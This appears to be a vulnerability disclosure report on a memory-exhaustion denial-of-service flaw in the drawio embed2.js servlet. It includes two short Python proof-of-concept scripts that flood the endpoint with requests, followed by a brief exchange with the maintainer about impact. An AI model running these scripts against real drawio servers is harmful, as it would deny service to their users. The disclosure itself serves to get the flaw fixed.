Denial of Service on embed2 servlet in jgraph/drawio
Reported on
May 19th 2022
Description
The application stores a 5MB file in a hashmap variable using a user input as a key, with a large number of requests its possible to increase the memory usage of the application and deny the access to embed2.js stencils resource
Proof of Concept
import requests
HOST="127.0.0.1:8080/embed2.js?s={0}aws4"
prefix=""
for i in range(0, 1000):
prefix+="/"
r = requests.get(HOST.format(prefix))
print(i)
Before the poc execution:
After:
I lowered the impact because I was not able to take down the application with this vulnerability, but after executing the POC its not possible to access the aws4 stencil anymore, this could be done to every stencil and deny the access to every stencil:
Update on report
import requests
HOST="http://127.0.0.1:8080/embed2.js?s={0}aws4"
prefix=""
try:
for i in range(0, 5000):
prefix+="./"
r = requests.get(HOST.format(prefix))
print(i)
except:
HOST="http://127.0.0.1:8080/embed2.js?s={0}aws3d"
try:
for i in range(0, 5000):
prefix+="./"
r = requests.get(HOST.format(prefix))
print(i)
except:
pass
With this poc I was able to take down the whole application
Impact
Deny the access to the stencils resource
Thanks for the report. How would you make the user request the URL so many times, create a site with JS that makes them call it over and over?
Actually it does not need user interaction, the attacker can make it by himself executing the payload POC
Hi, after some changes I was able to take down the whole drawio application with the payload above, so I adjusted the score